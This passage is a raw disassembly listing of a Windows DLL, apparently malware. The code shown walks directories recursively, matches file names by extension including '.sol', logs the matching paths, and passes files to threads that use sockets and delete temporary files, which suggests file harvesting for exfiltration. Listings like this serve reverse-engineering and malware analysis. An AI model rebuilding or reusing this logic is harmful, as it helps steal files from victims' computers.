jz loc_10006D5D
mov [ebp+FileName], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_51F]
rep stosd
stosw
push 0FFh ; nSize
lea ecx, [ebp+FileName]
push ecx ; lpFilename
push offset aMs32clod_4 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push 5Ch ; Ch
lea edx, [ebp+FileName]
push edx ; Str
call ds:strrchr ; strrchr
add esp, 8
mov byte ptr [eax+1], 0
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022068
push ecx ; Str
call sub_100010BB
add esp, 0Ch
mov [ebp+var_528], eax
mov edx, [ebp+var_528]
push edx ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call strcat ; strcat
add esp, 8
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesWritten
push 7Ch ; Val
mov eax, [ebp+Dst]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
add eax, 1
push eax ; lpString
call ds:lstrlenA ; lstrlenA
push eax ; nNumberOfBytesToWrite
push 7Ch ; Val
mov ecx, [ebp+Dst]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
add eax, 1
push eax ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:WriteFile ; WriteFile
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
push 7Ch ; Val
mov ecx, [ebp+Dst]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
loc_10006D5D: ; CODE XREF: StartAddress+701�j
push offset asc_10022C0C ; "\r\n\r\n"
mov edx, [ebp+Dst]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
add eax, 4
push eax ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_118], eax
jmp short loc_10006D93
; ---------------------------------------------------------------------------
loc_10006D87: ; CODE XREF: StartAddress+6E7�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006D93: ; CODE XREF: StartAddress+83E�j
jmp short loc_10006DA1
; ---------------------------------------------------------------------------
loc_10006D95: ; CODE XREF: StartAddress+675�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006DA1: ; CODE XREF: StartAddress:loc_10006D93�j
jmp loc_10006E6A
; ---------------------------------------------------------------------------
loc_10006DA6: ; DATA XREF: .rdata:stru_1001FE48�o
cmp [ebp+s], 0
jz short loc_10006DBC
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
loc_10006DBC: ; CODE XREF: StartAddress+866�j
mov [ebp+var_124], 0
jmp short loc_10006DD7
; ---------------------------------------------------------------------------
loc_10006DC8: ; CODE XREF: StartAddress+8AD�j
mov ecx, [ebp+var_124]
add ecx, 1
mov [ebp+var_124], ecx
loc_10006DD7: ; CODE XREF: StartAddress+87F�j
cmp [ebp+var_124], 5
jge short loc_10006DF6
mov edx, [ebp+var_124]
mov eax, [ebp+edx*4+buf]
push eax ; Memory
call ds:free ; free
add esp, 4
jmp short loc_10006DC8
; ---------------------------------------------------------------------------
loc_10006DF6: ; CODE XREF: StartAddress+897�j
cmp [ebp+var_418], 1
jnz short loc_10006E09
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_10006E09: ; CODE XREF: StartAddress+8B6�j
cmp [ebp+Memory], 0
jz short loc_10006E1C
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_10006E1C: ; CODE XREF: StartAddress+8C6�j
mov eax, [ebp+Dst]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+arg_0]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_48]
mov dword_1004B770[edx*4], 0
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
mov [ebp+var_524], 0
mov eax, offset loc_10006E5F
retn
; ---------------------------------------------------------------------------
loc_10006E5F: ; DATA XREF: StartAddress+912�o
mov eax, [ebp+var_524]
jmp loc_10006FC0
; ---------------------------------------------------------------------------
loc_10006E6A: ; CODE XREF: StartAddress:loc_10006DA1�j
mov [ebp+var_4], 0FFFFFFFFh
cmp [ebp+s], 0
jz short loc_10006E87
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
loc_10006E87: ; CODE XREF: StartAddress+931�j
mov [ebp+var_124], 0
jmp short loc_10006EA2
; ---------------------------------------------------------------------------
loc_10006E93: ; CODE XREF: StartAddress+978�j
mov ecx, [ebp+var_124]
add ecx, 1
mov [ebp+var_124], ecx
loc_10006EA2: ; CODE XREF: StartAddress+94A�j
cmp [ebp+var_124], 5
jge short loc_10006EC1
mov edx, [ebp+var_124]
mov eax, [ebp+edx*4+buf]
push eax ; Memory
call ds:free ; free
add esp, 4
jmp short loc_10006E93
; ---------------------------------------------------------------------------
loc_10006EC1: ; CODE XREF: StartAddress+962�j
cmp [ebp+var_418], 1
jnz short loc_10006ED4
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_10006ED4: ; CODE XREF: StartAddress+981�j
cmp [ebp+Memory], 0
jz short loc_10006EE7
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_10006EE7: ; CODE XREF: StartAddress+991�j
mov eax, [ebp+Dst]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+arg_0]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_48]
mov dword_1004B770[edx*4], 0
mov eax, [ebp+var_118]
jmp loc_10006FC0
; ---------------------------------------------------------------------------
loc_10006F1D: ; CODE XREF: StartAddress+26B�j
; StartAddress+2EA�j ...
cmp [ebp+s], 0
jz short loc_10006F33
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
loc_10006F33: ; CODE XREF: StartAddress+9DD�j
mov [ebp+var_124], 0
jmp short loc_10006F4E
; ---------------------------------------------------------------------------
loc_10006F3F: ; CODE XREF: StartAddress+A24�j
mov ecx, [ebp+var_124]
add ecx, 1
mov [ebp+var_124], ecx
loc_10006F4E: ; CODE XREF: StartAddress+9F6�j
cmp [ebp+var_124], 5
jge short loc_10006F6D
mov edx, [ebp+var_124]
mov eax, [ebp+edx*4+buf]
push eax ; Memory
call ds:free ; free
add esp, 4
jmp short loc_10006F3F
; ---------------------------------------------------------------------------
loc_10006F6D: ; CODE XREF: StartAddress+A0E�j
cmp [ebp+var_418], 1
jnz short loc_10006F80
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_10006F80: ; CODE XREF: StartAddress+A2D�j
cmp [ebp+Memory], 0
jz short loc_10006F93
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_10006F93: ; CODE XREF: StartAddress+A3D�j
mov eax, [ebp+Dst]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+arg_0]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_48]
mov dword_1004B770[edx*4], 0
xor eax, eax
loc_10006FC0: ; CODE XREF: StartAddress+91E�j
; StartAddress+9D1�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10006FD3(char *Source, LPCSTR lpString)
sub_10006FD3 proc near ; CODE XREF: sub_1000741F+4A5�p
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
SubStr = dword ptr -12Ch
lpString2 = dword ptr -128h
Str = dword ptr -104h
Memory = dword ptr -100h
var_FC = byte ptr -0FCh
Source = dword ptr 8
lpString = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 138h
push edi
mov eax, [ebp+lpString]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jnz short loc_10006FF5
mov eax, 1
jmp loc_100071BB
; ---------------------------------------------------------------------------
loc_10006FF5: ; CODE XREF: sub_10006FD3+16�j
mov [ebp+Memory], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_FC]
rep stosd
mov [ebp+SubStr], 0
mov ecx, 9
xor eax, eax
lea edi, [ebp+lpString2]
rep stosd
mov [ebp+var_130], 0
push offset a_ ; "."
lea ecx, [ebp+Memory]
push ecx ; int
mov edx, [ebp+Source]
push edx ; Source
call sub_100011DC
add esp, 0Ch
mov [ebp+Str], eax
push offset a__0 ; "."
lea eax, [ebp+SubStr]
push eax ; int
mov ecx, [ebp+lpString]
push ecx ; Source
call sub_100011DC
add esp, 0Ch
mov edx, [ebp+lpString2]
push edx ; lpString2
mov eax, [ebp+Str]
mov ecx, [ebp+eax*4+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz short loc_1000710B
cmp [ebp+SubStr], 0
jz short loc_100070A9
mov edx, [ebp+SubStr]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_100070A9: ; CODE XREF: sub_10006FD3+C4�j
cmp [ebp+lpString2], 0
jz short loc_100070C2
mov eax, [ebp+lpString2]
push eax ; Memory
call ds:free ; free
add esp, 4
loc_100070C2: ; CODE XREF: sub_10006FD3+DD�j
mov [ebp+var_134], 0
jmp short loc_100070DD
; ---------------------------------------------------------------------------
loc_100070CE: ; CODE XREF: sub_10006FD3+12F�j
mov ecx, [ebp+var_134]
add ecx, 1
mov [ebp+var_134], ecx
loc_100070DD: ; CODE XREF: sub_10006FD3+F9�j
mov edx, [ebp+var_134]
cmp edx, [ebp+Str]
jge short loc_10007104
mov eax, [ebp+var_134]
mov ecx, [ebp+eax*4+Memory]
push ecx ; Memory
call ds:free ; free
add esp, 4
jmp short loc_100070CE
; ---------------------------------------------------------------------------
loc_10007104: ; CODE XREF: sub_10006FD3+116�j
xor eax, eax
jmp loc_100071BB
; ---------------------------------------------------------------------------
loc_1000710B: ; CODE XREF: sub_10006FD3+BB�j
mov [ebp+var_138], 0
jmp short loc_10007126
; ---------------------------------------------------------------------------
loc_10007117: ; CODE XREF: sub_10006FD3+1AE�j
mov edx, [ebp+var_138]
add edx, 1
mov [ebp+var_138], edx
loc_10007126: ; CODE XREF: sub_10006FD3+142�j
mov eax, [ebp+var_138]
cmp eax, [ebp+Str]
jge short loc_10007183
mov ecx, [ebp+SubStr]
push ecx ; SubStr
mov edx, [ebp+var_138]
mov eax, [ebp+edx*4+Memory]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000716A
mov [ebp+var_130], 1
loc_1000716A: ; CODE XREF: sub_10006FD3+18B�j
mov ecx, [ebp+var_138]
mov edx, [ebp+ecx*4+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
jmp short loc_10007117
; ---------------------------------------------------------------------------
loc_10007183: ; CODE XREF: sub_10006FD3+15F�j
cmp [ebp+SubStr], 0
jz short loc_1000719C
mov eax, [ebp+SubStr]
push eax ; Memory
call ds:free ; free
add esp, 4
loc_1000719C: ; CODE XREF: sub_10006FD3+1B7�j
cmp [ebp+lpString2], 0
jz short loc_100071B5
mov ecx, [ebp+lpString2]
push ecx ; Memory
call ds:free ; free
add esp, 4
loc_100071B5: ; CODE XREF: sub_10006FD3+1D0�j
mov eax, [ebp+var_130]
loc_100071BB: ; CODE XREF: sub_10006FD3+1D�j
; sub_10006FD3+133�j
pop edi
mov esp, ebp
pop ebp
retn
sub_10006FD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100071C0(int, int, DWORD dwMilliseconds)
sub_100071C0 proc near ; CODE XREF: sub_100071C0+12B�p
; sub_1000B7EF+C7A�p ...
var_548 = dword ptr -548h
FindFileData = _WIN32_FIND_DATAA ptr -544h
var_404 = dword ptr -404h
FileName = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
dwMilliseconds = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 548h
push esi
mov [ebp+var_404], 1
mov [ebp+var_548], 0
mov eax, [ebp+arg_0]
push eax
push offset aS_ ; "%s\\*.*"
lea ecx, [ebp+FileName]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
lea edx, [ebp+FindFileData]
push edx ; lpFindFileData
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:FindFirstFileA ; FindFirstFileA
mov ecx, dword_100281F0
mov hFindFile[ecx*4], eax
mov edx, dword_100281F0
cmp hFindFile[edx*4], 0FFFFFFFFh
jz loc_1000741A
loc_1000722C: ; CODE XREF: sub_100071C0:loc_10007415�j
cmp [ebp+var_404], 0
jz loc_1000741A
mov eax, [ebp+FindFileData.dwFileAttributes]
and eax, 10h
test eax, eax
jz loc_10007330
push offset a__1 ; "."
lea ecx, [ebp+FindFileData.cFileName]
push ecx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_10007330
push offset a__ ; ".."
lea edx, [ebp+FindFileData.cFileName]
push edx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_10007330
mov eax, dword_100281F0
add eax, 1
mov dword_100281F0, eax
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, dword_100281F0
mov Dest[ecx*4], eax
lea edx, [ebp+FindFileData.cFileName]
push edx
mov eax, dword_100281F0
mov ecx, h[eax*4]
push ecx
push offset aSS_3 ; "%s\\%s"
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov ecx, [ebp+dwMilliseconds]
push ecx ; dwMilliseconds
mov edx, [ebp+arg_4]
push edx ; int
mov eax, dword_100281F0
mov ecx, Dest[eax*4]
push ecx ; int
call sub_100071C0
add esp, 0Ch
mov edx, dword_100281F0
mov eax, hFindFile[edx*4]
push eax ; hFindFile
call ds:FindClose ; FindClose
mov ecx, dword_100281F0
mov edx, Dest[ecx*4]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, dword_100281F0
sub eax, 1
mov dword_100281F0, eax
jmp loc_100073E4
; ---------------------------------------------------------------------------
loc_10007330: ; CODE XREF: sub_100071C0+84�j
; sub_100071C0+9E�j ...
mov ecx, [ebp+FindFileData.dwFileAttributes]
and ecx, 10h
test ecx, ecx
jnz loc_100073E4
mov [ebp+var_548], 0
loc_1000734B: ; CODE XREF: sub_100071C0+1B5�j
mov edx, [ebp+var_548]
mov eax, [ebp+arg_4]
cmp dword ptr [eax+edx*4], 0
jz short loc_10007377
cmp [ebp+var_548], 1000h
jnb short loc_10007377
mov ecx, [ebp+var_548]
add ecx, 1
mov [ebp+var_548], ecx
jmp short loc_1000734B
; ---------------------------------------------------------------------------
loc_10007377: ; CODE XREF: sub_100071C0+198�j
; sub_100071C0+1A4�j
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
lea ecx, [ebp+FindFileData.cFileName]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
lea edx, [esi+eax+0Ah]
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_548]
mov edx, [ebp+arg_4]
mov [edx+ecx*4], eax
lea eax, [ebp+FindFileData.cFileName]
push eax
mov ecx, dword_100281F0
mov edx, Dest[ecx*4]
push edx
push offset aSS_4 ; "%s\\%s"
mov eax, [ebp+var_548]
mov ecx, [ebp+arg_4]
mov edx, [ecx+eax*4]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
loc_100073E4: ; CODE XREF: sub_100071C0+16B�j
; sub_100071C0+17B�j
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
mov ecx, dword_100281F0
mov edx, hFindFile[ecx*4]
push edx ; hFindFile
call ds:FindNextFileA ; FindNextFileA
mov [ebp+var_404], eax
cmp [ebp+dwMilliseconds], 0
jz short loc_10007415
mov eax, [ebp+dwMilliseconds]
push eax ; dwMilliseconds
call ds:Sleep ; Sleep
loc_10007415: ; CODE XREF: sub_100071C0+249�j
jmp loc_1000722C
; ---------------------------------------------------------------------------
loc_1000741A: ; CODE XREF: sub_100071C0+66�j
; sub_100071C0+73�j
pop esi
mov esp, ebp
pop ebp
retn
sub_100071C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000741F(char *Str, int, int, int, int, int, LPCSTR lpString2, LPCSTR lpFileName, DWORD dwMilliseconds)
sub_1000741F proc near ; CODE XREF: sub_1000741F+190�p
; sub_1000B027+1B0�p ...
var_A58 = dword ptr -0A58h
FindFileData = _WIN32_FIND_DATAA ptr -0A54h
String1 = byte ptr -914h
var_814 = dword ptr -814h
hObject = dword ptr -810h
String2 = byte ptr -80Ch
var_40C = dword ptr -40Ch
NumberOfBytesWritten= dword ptr -408h
FileName = byte ptr -404h
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
lpString2 = dword ptr 20h
lpFileName = dword ptr 24h
dwMilliseconds = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 0A58h
mov [ebp+var_814], 1
mov [ebp+var_A58], 0
mov [ebp+var_40C], 0
mov [ebp+var_4], 0
push 5Ch ; Ch
mov eax, [ebp+Str]
push eax ; Str
call ds:strrchr ; strrchr
add esp, 8
add eax, 1
push eax ; lpString2
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 3Fh ; Val
mov edx, [ebp+Str]
push edx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_10007499
push 3Fh ; Val
mov eax, [ebp+Str]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
mov [ebp+var_4], 1
loc_10007499: ; CODE XREF: sub_1000741F+5F�j
mov ecx, [ebp+Str]
push ecx
push offset aS__0 ; "%s\\*.*"
lea edx, [ebp+FileName]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:FindFirstFileA ; FindFirstFileA
mov edx, [ebp+arg_C]
mov ecx, [ebp+arg_8]
mov [ecx+edx*4], eax
mov edx, [ebp+arg_C]
mov eax, [ebp+arg_8]
cmp dword ptr [eax+edx*4], 0FFFFFFFFh
jz loc_10007B30
loc_100074DF: ; CODE XREF: sub_1000741F:loc_10007B2B�j
cmp [ebp+var_814], 0
jz loc_10007B30
mov ecx, [ebp+FindFileData.dwFileAttributes]
and ecx, 10h
test ecx, ecx
jz loc_100075E8
push offset a__2 ; "."
lea edx, [ebp+FindFileData.cFileName]
push edx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_100075E8
push offset a___0 ; ".."
lea eax, [ebp+FindFileData.cFileName]
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_100075E8
cmp [ebp+var_4], 0
jnz loc_100075E8
mov ecx, [ebp+arg_C]
add ecx, 1
mov [ebp+arg_C], ecx
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [ecx+edx*4], eax
lea edx, [ebp+FindFileData.cFileName]
push edx
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov edx, [ecx+eax*4-4]
push edx
push offset aSS_5 ; "%s\\%s"
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov edx, [ecx+eax*4]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov eax, [ebp+dwMilliseconds]
push eax ; dwMilliseconds
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
mov edx, [ebp+lpString2]
push edx ; lpString2
mov eax, [ebp+arg_14]
push eax ; int
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_C]
mov eax, [ebp+arg_4]
mov ecx, [eax+edx*4]
push ecx ; Str
call sub_1000741F
add esp, 24h
mov edx, [ebp+arg_C]
mov eax, [ebp+arg_8]
mov ecx, [eax+edx*4]
push ecx ; hFindFile
call ds:FindClose ; FindClose
mov edx, [ebp+arg_C]
mov eax, [ebp+arg_4]
mov ecx, [eax+edx*4]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+arg_C]
sub edx, 1
mov [ebp+arg_C], edx
jmp loc_10007AFE
; ---------------------------------------------------------------------------
loc_100075E8: ; CODE XREF: sub_1000741F+D8�j
; sub_1000741F+F2�j ...
mov eax, [ebp+FindFileData.dwFileAttributes]
and eax, 10h
test eax, eax
jz short loc_10007610
mov ecx, [ebp+FindFileData.dwFileAttributes]
and ecx, 10h
test ecx, ecx
jz loc_10007AFE
cmp [ebp+var_4], 0
jz loc_10007AFE
loc_10007610: ; CODE XREF: sub_1000741F+1D4�j
lea edx, [ebp+FindFileData.cFileName]
push edx
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov edx, [ecx+eax*4]
push edx
push offset aSS_6 ; "%s\\%s"
lea eax, [ebp+String2]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov [ebp+var_40C], 0
loc_10007640: ; CODE XREF: sub_1000741F+24C�j
mov ecx, [ebp+var_40C]
cmp dword_1004B770[ecx*4], 0
jz short loc_1000766D
cmp [ebp+var_40C], 1000h
jnb short loc_1000766D
mov edx, [ebp+var_40C]
add edx, 1
mov [ebp+var_40C], edx
jmp short loc_10007640
; ---------------------------------------------------------------------------
loc_1000766D: ; CODE XREF: sub_1000741F+22F�j
; sub_1000741F+23B�j
cmp [ebp+arg_10], 0
jz short loc_1000767F
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz loc_10007883
loc_1000767F: ; CODE XREF: sub_1000741F+252�j
cmp [ebp+arg_14], 0
jz short loc_1000768F
cmp [ebp+arg_14], 1
jnz loc_100077ED
loc_1000768F: ; CODE XREF: sub_1000741F+264�j
cmp [ebp+var_40C], 1000h
jnb loc_100077ED
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_40C]
mov dword_1004B770[ecx*4], eax
mov edx, [ebp+lpString2]
push edx ; lpString2
mov eax, [ebp+var_40C]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+100h], 0
mov ecx, [ebp+var_40C]
mov edx, dword_1004B770[ecx*4]
mov dword ptr [edx+104h], 0
lea eax, [ebp+String2]
push eax ; lpString2
mov ecx, [ebp+var_40C]
mov edx, dword_1004B770[ecx*4]
add edx, 108h
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea eax, [ebp+FindFileData.cFileName]
push eax
push offset byte_10065ED8
push offset aS__S ; "%s__%s"
mov ecx, [ebp+var_40C]
mov edx, dword_1004B770[ecx*4]
add edx, 207h
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push offset a_sol ; ".sol"
lea eax, [ebp+FindFileData.cFileName]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000779D
lea ecx, [ebp+FindFileData.cFileName]
push ecx
lea edx, [ebp+String1]
push edx
push offset byte_10065ED8
push offset aS__SS ; "%s__%s&&%s"
mov eax, [ebp+var_40C]
mov ecx, dword_1004B770[eax*4]
add ecx, 207h
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 14h
loc_1000779D: ; CODE XREF: sub_1000741F+347�j
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+var_40C]
mov [eax+308h], ecx
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+arg_14]
mov [eax+30Ch], ecx
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
push eax ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_100077ED: ; CODE XREF: sub_1000741F+26A�j
; sub_1000741F+27A�j
cmp [ebp+arg_14], 3
jnz loc_1000787E
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
mov edx, [ebp+hObject]
push edx ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
lea ecx, [ebp+String2]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
push eax ; nNumberOfBytesToWrite
lea edx, [ebp+String2]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
push 2 ; nNumberOfBytesToWrite
push offset asc_10022C78 ; "\r\n"
mov edx, [ebp+hObject]
push edx ; hFile
call ds:WriteFile ; WriteFile
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000787E: ; CODE XREF: sub_1000741F+3D2�j
jmp loc_10007AFE
; ---------------------------------------------------------------------------
loc_10007883: ; CODE XREF: sub_1000741F+25A�j
mov [ebp+var_A58], 0
loc_1000788D: ; CODE XREF: sub_1000741F+6DA�j
mov ecx, [ebp+var_A58]
mov edx, [ebp+arg_10]
cmp dword ptr [edx+ecx*4], 0
jz loc_10007AFE
cmp [ebp+var_A58], 1000h
jnb loc_10007AFE
mov eax, [ebp+var_A58]
mov ecx, [ebp+arg_10]
mov edx, [ecx+eax*4]
push edx ; lpString
lea eax, [ebp+FindFileData.cFileName]
push eax ; Source
call sub_10006FD3
add esp, 8
test eax, eax
jz loc_10007AEA
cmp [ebp+arg_14], 0
jz short loc_100078E4
cmp [ebp+arg_14], 1
jnz loc_10007A42
loc_100078E4: ; CODE XREF: sub_1000741F+4B9�j
cmp [ebp+var_40C], 1000h
jnb loc_10007A42
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_40C]
mov dword_1004B770[ecx*4], eax
mov edx, [ebp+lpString2]
push edx ; lpString2
mov eax, [ebp+var_40C]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+100h], 0
mov ecx, [ebp+var_40C]
mov edx, dword_1004B770[ecx*4]
mov dword ptr [edx+104h], 0
lea eax, [ebp+String2]
push eax ; lpString2
mov ecx, [ebp+var_40C]
mov edx, dword_1004B770[ecx*4]
add edx, 108h
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea eax, [ebp+FindFileData.cFileName]
push eax
push offset byte_10065ED8
push offset aS__S_file ; "%s__%s.file"
mov ecx, [ebp+var_40C]
mov edx, dword_1004B770[ecx*4]
add edx, 207h
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push offset a_sol_0 ; ".sol"
lea eax, [ebp+FindFileData.cFileName]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_100079F2
lea ecx, [ebp+FindFileData.cFileName]
push ecx
lea edx, [ebp+String1]
push edx
push offset byte_10065ED8
push offset aS__SS_0 ; "%s__%s&&%s"
mov eax, [ebp+var_40C]
mov ecx, dword_1004B770[eax*4]
add ecx, 207h
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 14h
loc_100079F2: ; CODE XREF: sub_1000741F+59C�j
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+var_40C]
mov [eax+308h], ecx
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+arg_14]
mov [eax+30Ch], ecx
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov edx, [ebp+var_40C]
mov eax, dword_1004B770[edx*4]
push eax ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_10007A42: ; CODE XREF: sub_1000741F+4BF�j
; sub_1000741F+4CF�j
cmp [ebp+arg_14], 3
jnz loc_10007AD5
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
